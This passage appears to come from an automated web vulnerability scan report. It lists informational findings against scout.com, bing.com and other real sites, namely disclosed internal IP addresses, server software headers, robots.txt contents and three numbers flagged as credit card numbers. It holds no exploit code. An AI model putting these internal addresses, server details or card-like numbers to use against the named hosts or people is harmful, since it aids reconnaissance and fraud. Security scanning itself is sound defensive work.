PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Jobs at Scout.com</title>
<meta http-equi
...[SNIP]...

...[SNIP]...

27.63. http://www.scout.com/3/jobs.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/jobs.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.56

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:37 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18925

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Jobs at Scout.com</title>
<meta http-equi
...[SNIP]...

...[SNIP]...

27.64. http://www.scout.com/3/privacy-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/privacy-policy.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.57

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:24 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36135

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Privacy Policy</title>
<meta http-equiv="
...[SNIP]...

...[SNIP]...

27.65. http://www.scout.com/3/privacy-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/privacy-policy.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.56

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:33 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36133

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Privacy Policy</title>
<meta http-equiv="
...[SNIP]...

...[SNIP]...

27.66. http://www.scout.com/3/recruiting-links.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/recruiting-links.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.57

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:02 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12567

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...

...[SNIP]...

27.67. http://www.scout.com/3/recruiting-links.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/recruiting-links.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.56

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:40 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12565

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...

...[SNIP]...

27.68. http://www.scout.com/3/security-information.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/security-information.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.88

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13553

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Security Information</title>
<meta http-e
...[SNIP]...

...[SNIP]...

27.69. http://www.scout.com/3/terms-of-service.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/terms-of-service.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.56

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:32 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53552

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Terms of Service</title>
<meta http-equiv
...[SNIP]...

...[SNIP]...

27.70. http://www.scout.com/3/terms-of-service.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/terms-of-service.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.57

Request

Response

27.71. http://www.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.181
192.168.20.76

Request

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 17:15:28 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:25:28 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 5 ms
Vary: Accept-Encoding
Content-Length: 22871

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Choose College Team Site</title>
<meta ht
...[SNIP]...

...[SNIP]...

27.72. http://www.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.186
192.168.20.63

Request

Response

27.73. http://www.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 01:27:22 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:22 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.74. http://www.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.181
192.168.20.77

Request

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 01:25:48 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:35:48 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 54 ms
Vary: Accept-Encoding
Content-Length: 22871

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Choose College Team Site</title>
<meta ht
...[SNIP]...

...[SNIP]...

27.75. http://www.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.186
192.168.20.77

Request

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 19:57:34 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 20:07:34 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 44 ms
Vary: Accept-Encoding
Content-Length: 22874

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Choose College Team Site</title>
<meta ht
...[SNIP]...

...[SNIP]...

27.76. http://www.scout.com/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/search.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.181
192.168.20.72

Request

GET /search.aspx HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:58 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14373

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<ht
...[SNIP]...

...[SNIP]...

27.77. http://www.scout.com/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/search.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.181
192.168.20.92

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:17:16 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14261

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Search</title>
<meta http-equiv="Content-
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.78. http://www.scout.com/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/search.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.181
192.168.20.75

Request

Response

27.79. http://www.scout.com/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/search.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.181
192.168.20.70

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:49 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12959

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Search</title>
<meta http-equiv="Content-
...[SNIP]...

...[SNIP]...

27.80. http://www.scout.com/widgets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/widgets/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:27 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:27 GMT
Last-Modified: Fri, 28 Jan 2011 00:49:27 GMT
ETag: "1CBBE8536D44580"
Content-Type: text/html
Content-Length: 14619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.81. http://www.unica.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.unica.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.1.90

Request

GET / HTTP/1.1
Host: www.unica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28. Credit card numbers disclosed previous next
There are 3 instances of this issue:

http://money.redacted/investing/stock-picks-to-change-your-life.aspx
http://www.bing.com/travel/content/search
http://www.bing.com/travel/content/search

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

28.1. http://money.redacted/investing/stock-picks-to-change-your-life.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/investing/stock-picks-to-change-your-life.aspx

Issue detail

The following credit card number was disclosed in the response:

4684711528814319

Request

Response

28.2. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The following credit card number was disclosed in the response:

4709092502668224

Request

Response

28.3. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The following credit card number was disclosed in the response:

4631074424554800

Request

Response

29. Robots.txt file previous next
There are 130 instances of this issue:

http://ad.ae.doubleclick.net/adj/aljazeera_EN/middleeast
http://advertising.aol.com/privacy/advertisingcom/opt-out
http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css
http://alex-johnson.newsvine.com/
http://amch.questionmarket.com/adsc/d852149/4/864449/randm.js
http://articles.redacted/news/news.aspx
http://athima-chansanchai.newsvine.com/
http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
http://b.rad.redacted/ADSAdClient31.dll
http://b.voicefive.com/b
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90
http://bassistance.de/jquery-plugins/jquery-plugin-validation/
http://beta-ads.ace.advertising.com/
http://blog.deconcept.com/swfobject/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.nature.com/news/thegreatbeyond/
http://bodyodd.msnbc.redacted/
http://boyle.newsvine.com/
http://calendar.live.com/calendar/calendar.aspx
http://careers.redacted/
http://cartoonblog.msnbc.redacted/
http://clients1.google.com/complete/search
http://cm.g.doubleclick.net/pixel
http://college.scout.com/
http://collegebasketball.scout.com/
http://collegefootball.scout.com/
http://curmudgeons.blogspot.com/
http://dateline.msnbc.com/
http://developer.yahoo.net/yui/license.txt
http://digitalnature.ro/projects/fusion
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://earthsky.org/
http://ec.redcated/ds/UXULASONYSEL/
http://eurekalert.org/
http://hardball.msnbc.com/
http://helenaspopkin.newsvine.com/
http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy
http://jcfootball.scout.com/
http://jp.video.redacted/
http://jquery.org/license
http://latino.video.redacted/
http://live.newsvine.com/
http://login.live.com/gls.srf
http://malexj.tk/6M
http://malexj.wordpress.com/
http://michaelwann.newsvine.com/
http://mlb.scout.com/
http://msnbc.com/
http://mtp.msnbc.com/
http://music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://nbcsports.msnbc.com/id/41325676/ns/sports-tennis/
http://netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://ninemsn.video.redacted/
http://openchannel.msnbc.redacted/
http://p.ace.advertising.com/
http://pagead2.googlesyndication.com/pagead/expansion_embed.js
http://planetary.org/blog
http://preps.scout.com/
http://profootball.scout.com/
http://progolftalk.nbcsports.com/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related
http://r1.ace.advertising.com/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://redtape.newsvine.com/
http://rss.scout.com/rss.aspx
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://safebrowsing.clients.google.com/safebrowsing/downloads
http://science.slashdot.org/
https://secure.scout.com/js/oo_engine.js
https://security.live.com/LoginStage.aspx
http://seedmagazine.com/
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://suzanne-choney.newsvine.com/
http://technolog2.newsvine.com/
http://thelastword.msnbc.redacted/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://top.newsvine.com/users
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
https://twitter.com/ToddKenreck
http://wbenedetti.newsvine.com/
http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html
http://widgets.digg.com/buttons.js
http://www.adobe.com/cfusion/knowledgebase/index.cfm
http://www.amazon.com/gp/product/1935182374
http://www.batstrading.com/
http://www.briefing.com/
http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.dailygrail.com/
http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.ftc.gov/ogc/coppa1.htm
http://www.googleadservices.com/pagead/conversion.js
http://www.habitablezone.com/space/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/
http://www.livescience.com/
http://www.morningstar.com/
http://www.msnbc.com/
http://www.nasaspaceflight.com/
https://www.newsvine.com/_nv/api/accounts/login
http://www.outofthecradle.net/
http://www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.polls.newsvine.com/_vine/js/pierre
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.reuters.com/
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scientificamerican.com/blog/observations/
http://www.scout.com/webproxy.ashx
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.theshophound.typepad.com/|http:/www.chicgalleria.com|http:/lastylistmom.com|http:/www.chicgirlstyle.com|http:/blog.sofiawean.com|http:/www.themakeupblogger.com|http:/www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.ticketcity.com/
http://www.tigerdirect.com/applications/SearchTools/item-details.asp
http://www.twitter.com/MAlexJohnson
http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

29.1. http://ad.ae.doubleclick.net/adj/aljazeera_EN/middleeast previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.ae.doubleclick.net
Path:	/adj/aljazeera_EN/middleeast

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.ae.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 30 Jan 2011 14:48:18 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

29.2. http://advertising.aol.com/privacy/advertisingcom/opt-out previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/privacy/advertisingcom/opt-out

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: advertising.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 13 Feb 2011 02:05:22 GMT
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

29.3. http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Sun, 30 Jan 2011 01:39:20 GMT
Expires: Sun, 30 Jan 2011 01:39:20 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.4. http://alex-johnson.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://alex-johnson.newsvine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: alex-johnson.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
